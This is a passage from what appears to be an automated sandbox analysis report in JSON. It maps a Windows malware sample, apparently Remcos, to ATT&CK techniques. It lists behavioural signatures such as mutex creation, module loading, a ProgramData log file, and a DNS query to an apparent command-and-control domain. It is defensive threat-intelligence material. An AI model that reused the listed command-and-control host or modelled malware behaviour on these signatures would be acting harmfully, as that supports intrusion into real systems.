"suspicious_identifiers_count": 2}, {"tactic": "Command and Control", "technique": "Web Protocols", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001", "informative_identifiers_count": 1, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Ingress Tool Transfer", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105", "suspicious_identifiers_count": 2, "informative_identifiers_count": 3}, {"tactic": "Command and Control", "technique": "DNS", "attck_id": "T1071.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/004", "informative_identifiers_count": 1, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Domain Generation Algorithms", "attck_id": "T1568.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1568/002", "informative_identifiers_count": 1, "parent": {"technique": "Dynamic Resolution", "attck_id": "T1568", "attck_id_wiki": "https://attack.mitre.org/techniques/T1568"}}, {"tactic": "Command and Control", "technique": "Web Service", "attck_id": "T1102", "attck_id_wiki": "https://attack.mitre.org/techniques/T1102", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Non-Standard Port", "attck_id": "T1571", "attck_id_wiki": "https://attack.mitre.org/techniques/T1571", "suspicious_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Symmetric Cryptography", "attck_id": "T1573.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573/001", "informative_identifiers_count": 1, "parent": {"technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}}, {"tactic": "Command and Control", "technique": "Asymmetric Cryptography", "attck_id": "T1573.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573/002", "informative_identifiers_count": 1, "parent": {"technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}}, {"tactic": "Exfiltration", "technique": "Scheduled Transfer", "attck_id": "T1029", "attck_id_wiki": "https://attack.mitre.org/techniques/T1029", "informative_identifiers_count": 1}, {"tactic": "Exfiltration", "technique": "Exfiltration Over Web Service", "attck_id": "T1567", "attck_id_wiki": "https://attack.mitre.org/techniques/T1567", "suspicious_identifiers_count": 1}, {"tactic": "Impact", "technique": "Service Stop", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489", "suspicious_identifiers_count": 1, "informative_identifiers_count": 6}, {"tactic": "Impact", "technique": "System Shutdown/Reboot", "attck_id": "T1529", "attck_id_wiki": "https://attack.mitre.org/techniques/T1529", "malicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "Data Encrypted for Impact", "attck_id": "T1486", "attck_id_wiki": "https://attack.mitre.org/techniques/T1486", "informative_identifiers_count": 1}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "module-9", "type": 10, "name": "Loads the Bcrypt module DLL", "description": "\"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55.exe\" loaded module \"%WINDIR%\\System32\\bcrypt.dll\" at 75670000", "origin": "Loaded Module", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "mutant-0", "type": 4, "relevance": 3, "name": "Creates mutants", "description": "\"\\Sessions\\1\\BaseNamedObjects\\Rmc-E3OCRB\"\n \"Rmc-E3OCRB\"", "origin": "Created Mutant", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-153", "name": "Uses 32 bit executable PE", "description": "\"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-96", "name": "PE file entrypoint instructions", "description": "\"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55\" file has an entrypoint instructions - \"call\t0x434ecb,jmp\t0x434918,push\tebp,mov\tebp, esp,sub\tesp, 0x324,push\tebx,push\tesi,push\t0x17,call\t0x45717a,test\teax, eax,je\t0x434aa5,mov\tecx, dword ptr [ebp + 8],int\t0x29,xor\tesi, esi,lea\teax, [ebp - 0x324],push\t0x2cc,push\tesi,push\teax,mov\tdword ptr [0x471d14], esi,call\t0x436f10,add\tesp, 0xc,mov\tdword ptr [ebp - 0x274], eax,mov\tdword ptr [ebp - 0x278], ecx,mov\tdword ptr [ebp - 0x27c], edx,mov\tdword ptr [ebp - 0x280], ebx,mov\tdword ptr [ebp - 0x284], esi,\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-8", "type": 6, "relevance": 1, "name": "Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)", "description": "\"0d000e00844bfe6c@Iphlpapi.DLL\"\n \"0f001000dc4bfe6c@Iphlpapi.DLL\"\n \"0c000d00244cfe6c@Iphlpapi.DLL\"\n \"140015006c4cfe6c@Iphlpapi.DLL\"\n \"0c000d00e04cfe6c@Iphlpapi.DLL\"\n \"15001600c03efe6c@ADVAPI32.dll\"\n \"0e000f00703ffe6c@ADVAPI32.dll\"\n \"0e000f00cc3ffe6c@ADVAPI32.dll\"\n \"11001200b447fe6c@ADVAPI32.dll\"\n \"110012004848fe6c@ADVAPI32.dll\"\n \"120013008c48fe6c@ADVAPI32.dll\"\n \"12001300e448fe6c@ADVAPI32.dll\"\n \"14001500dc6ffe6c@ADVAPI32.dll\"\n \"14001500f46ffe6c@ADVAPI32.dll\"\n \"140015000c70fe6c@ADVAPI32.dll\"\n \"170018002470fe6c@ADVAPI32.dll\"\n \"0d000e003c70fe6c@ADVAPI32.dll\"\n \"110012004c70fe6c@ADVAPI32.dll\"\n \"110012006070fe6c@ADVAPI32.dll\"\n \"0d000e00f066fe6c@WININET.dll\"\n \"0d000e006067fe6c@WININET.dll\"\n \"100011009867fe6c@WININET.dll\"\n \"100011003c68fe6c@WININET.dll\"\n \"10001100a470fe6c@WININET.dll\"\n \"10001100b870fe6c@WININET.dll\"", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-176", "type": 6, "relevance": 1, "name": "Calls an API typically used to retrieve function addresses", "description": "\"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00003032)\n \"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00003032)\n \"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00003032)\n \"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00003032)\n \"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00003032)\n \"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00003032)\n \"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00003032)\n \"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00003032)\n \"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00003032)\n \"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00003032)\n \"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00003032)\n \"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00003032)\n \"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00003032)\n \"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00003032)\n \"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00003032)\n \"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00003032)\n \"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00003032)\n \"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00003032)\n \"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00003032)\n \"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00003032)\n \"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00003032)\n \"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00003032)\n \"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00003032)\n \"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00003032)\n \"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00003032)\n \"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00003032)\n \"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00003032)\n \"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00003032)\n \"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00003032)\n \"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00003032)\n \"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00003032)\n \"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00003032)\n \"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00003032)\n \"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00003032)\n \"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00003032)\n \"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00003032)\n \"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00003032)\n \"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00003032)\n \"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00003032)\n \"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00003032)\n \"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00003032)\n \"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00003032)\n \"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55.exe\" called \"GetProcAddress\" with a parameter getaddrinfo (UID: 00000000-00003032)\n \"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55.exe\" called \"GetProcAddress\" with a parameter getnameinfo (UID: 00000000-00003032)\n \"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55.exe\" called \"GetProcAddress\" with a parameter freeaddrinfo (UID: 00000000-00003032)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-122", "type": 6, "relevance": 3, "name": "Calls an API typically used to create a directory", "description": "\"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55.exe\" called \"CreateDirectoryW\" with parameter %ALLUSERSPROFILE%\\rmc (UID: 00000000-00003032)", "origin": "API Call", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001"}, {"threat_level_human": "informative", "category": "General", "identifier": "network-51", "type": 7, "relevance": 1, "name": "Queries DNS server", "description": "\"remcos2010.duckdns.org\"", "origin": "Network Traffic", "attck_id": "T1071.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/004"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-80", "relevance": 1, "name": "PE file contains executable sections", "description": "\"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55\" has an executable section named \".text\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-95", "name": "PE file contains writable sections", "description": "\"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55\" has an writable section named \".data\"\n \"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55\" has an writable section named \".tls\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-146", "name": "PE file contains Debug data directory", "description": "\"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55\" has Debug data directory \"IMAGE_DIRECTORY_ENTRY_DEBUG\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-7", "type": 6, "relevance": 1, "name": "Loads modules at runtime", "description": "\"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71e70000\n \"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55.exe\" loaded module \"KERNEL32\" at base 76bf0000\n \"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6cf50000\n \"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55.exe\" loaded module \"KERNEL32.DLL\" at base 76bf0000\n \"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WS2_32\" at base 77df0000\n \"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55.exe\" loaded module \"%WINDIR%\\SYSTEM32\\MSWSOCK.DLL\" at base 75520000\n \"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WSHTCPIP.DLL\" at base 75080000\n \"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WSHIP6.DLL\" at base 75510000\n \"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55.exe\" loaded module \"DNSAPI.DLL\" at base 753e0000\n \"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55.exe\" loaded module \"IPHLPAPI.DLL\" at base 73ec0000\n \"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55.exe\" loaded module \"RPCRT4.DLL\" at base 77300000\n \"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55.exe\" loaded module \"RASADHLP.DLL\" at base 6e6a0000", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-175", "type": 6, "relevance": 1, "name": "Calls an API typically used to load libraries", "description": "\"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003032)\n \"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003032)\n \"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003032)\n \"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003032)\n \"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\ws2_32 (UID: 00000000-00003032)", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-22", "type": 6, "relevance": 1, "name": "Fails to load modules at runtime", "description": "\"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]", "origin": "API Call", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-10", "type": 10, "name": "Loads the RPC (Remote Procedure Call) module DLL", "description": "\"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 77300000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-25", "type": 3, "relevance": 3, "name": "Reads information about supported languages", "description": "\"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55\" was detected as \"EP:Microsoft Visual C/C++\" and name: \"Compiler\"\n \"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55\" was detected as \"Microsoft Visual C/C++\" and name: \"Compiler\"\n \"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55\" was detected as \"Microsoft Linker\" and name: \"Linker\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "static-18", "relevance": 10, "name": "Matched Compiler/Packer signature", "description": "\"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55\" was detected as \"VC8 -> Microsoft Corporation\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-126", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (executable)", "description": "\"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55.exe\" trying to access non-existent file \"C:\\WINMM.dll\"\n \"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55.exe\" trying to access non-existent file \"C:\\version.DLL\"\n \"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55.exe\" trying to access non-existent file \"C:\\shcore.DLL\"\n \"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55.exe\" trying to access non-existent file \"C:\\Windows\\system32\\shcore.DLL\"\n \"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55.exe\" trying to access non-existent file \"C:\\Windows\\system\\shcore.DLL\"\n \"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55.exe\" trying to access non-existent file \"C:\\Windows\\shcore.DLL\"\n \"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55.exe\" trying to access non-existent file \"C:\\ProgramData\\Oracle\\Java\\javapath\\shcore.DLL\"\n \"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55.exe\" trying to access non-existent file \"C:\\Windows\\System32\\Wbem\\shcore.DLL\"\n \"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55.exe\" trying to access non-existent file \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\shcore.DLL\"\n \"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55.exe\" trying to access non-existent file \"C:\\Iphlpapi.DLL\"\n \"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55.exe\" trying to access non-existent file \"C:\\WINNSI.DLL\"\n \"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55.exe\" trying to access non-existent file \"C:\\Rstrtmgr.DLL\"\n \"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55.exe\" trying to access non-existent file \"C:\\ncrypt.dll\"\n \"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55.exe\" trying to access non-existent file \"C:\\bcrypt.dll\"\n \"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55.exe\" trying to access non-existent file \"C:\\SspiCli.dll\"\n \"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-264", "type": 6, "relevance": 3, "name": "Creates a thread in a self process", "description": "\"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55.exe\" creates a thread in process \"-1\" (Handle: 4294967295)", "origin": "API Call", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-159", "type": 6, "relevance": 1, "name": "Writes log files", "description": "\"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55.exe\" writes a file \"C:\\ProgramData\\rmc\\registros.dat\"\n \"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55.exe\" writes a file \"%ALLUSERSPROFILE%\\rmc\\registros.dat\"", "origin": "API Call", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-177", "type": 3, "relevance": 1, "name": "Opens registry keys", "description": "\"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\RMC-E3OCRB\\\"; Key: \"\"; Value: \"\")\n \"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"\"; Value: \"\")\n \"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\TIME ZONES\\ROMANCE STANDARD TIME\\DYNAMIC DST\"; Key: \"\"; Value: \"\")\n \"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"\"; Value: \"\")\n \"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"\"; Value: \"\")\n 